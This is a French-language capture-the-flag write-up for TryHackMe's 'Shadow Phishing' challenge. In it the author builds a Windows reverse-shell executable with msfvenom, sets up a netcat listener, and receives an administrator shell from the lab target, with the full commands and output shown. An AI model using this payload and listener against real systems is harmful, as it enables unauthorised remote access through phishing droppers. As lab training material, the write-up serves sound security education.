TryHackMe - Shadow Phishing
Dans le cadre du Hackfinity Battle sur TryHackMe, le challenge "Shadow Phishing" nous plonge dans un scénario RedTeam où nous devons simuler une attaque de phishing avancée. Un certain "Cipher" (cipher@darknetmail.corp) envoie un email à "ShadowByte" (shadowbyte@darknetmail.corp), demandant la création d’un build du "SilentEdge Installer", un exécutable malveillant qui doit fonctionner proprement sur Windows 10 x64. L’objectif est de générer cet EXE, de confirmer qu’il établit une connexion reverse shell (simulant une porte dérobée installée via une campagne de phishing), et de le soumettre pour un "dead drop". Voici comment j’ai résolu ce défi, étape par étape.
Analyse
L’email de Cipher précise que nous devons créer un exécutable nommé SilentEdge Installer
qui fonctionne sur Windows 10 x64. Bien que l’email ne mentionne pas explicitement un antivirus, le contexte du challenge Shadow Phishing suggère que l’EXE pourrait être utilisé dans une campagne de phishing pour installer une porte dérobée.
Mon objectif était donc de :
- Générer un payload reverse shell avec
msfvenom
. - Configurer un listener pour recevoir la connexion.
- Soumettre l’exécutable pour valider le challenge via le dead drop.
Resolution
D’abord pour resoudre ce challenge, je vais commencer par un basic msfvenom
pour creer un payload en .exe
et voir s’il vas fonctionner ou si l’antivirus vas le flagger
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=tun0 LPORT=1337 -f exe -o hack.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of exe file: 7168 bytes
Saved as: hack.exe
$ sudo rlwrap nc -lnvp 1337
listening on [any] 1337 ...
connect to [10.6.8.193] from (UNKNOWN) [10.10.254.169] 49899
Microsoft Windows [Version 10.0.17763.1821]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
fisher\administrator
C:\Windows\system32>
J’ai généré un payload avec msfvenom
en utilisant le windows/x64/shell_reverse_tcp
, qui est compatible avec Windows 10 x64. J’ai spécifié mon LHOST
comme tun0
(mon IP sur le réseau VPN de TryHackMe, ici 10.6.8.193
) et le LPORT
comme 1337
. Le fichier généré, hack.exe
, fait 7168
bytes.
Ensuite, j’ai configuré un listener avec netcat
en utilisant sudo rlwrap nc -lnvp 1337
pour recevoir la connexion reverse shell. Après avoir exécuté hack.exe
sur la machine cible (une machine Windows 10 x64 fournie par le challenge), j’ai reçu une connexion sur mon listener. La commande whoami
a confirmé que j’avais un shell avec les privilèges de l’utilisateur fisher\administrator
, ce qui signifie qu’on a un accès administrateur.
Conclusion
Le challenge Shadow Phishing m’a permis de renforcer mes compétences en création de payloads malveillants et en simulation d’attaques de phishing, des techniques clés pour les opérations RedTeam. J’ai particulièrement apprécié le réalisme du scénario, qui met en scène une communication entre deux acteurs malveillants et une tâche concrète de création d’un dropper. Un grand merci à TryHackMe pour ce défi stimulant !
Ressources supplementaires
Voici quelques ressources supplémentaires qui pourraient vous être utiles :
- Love my artciles? Follow me on Twitter and Github
- Join Us on Discord.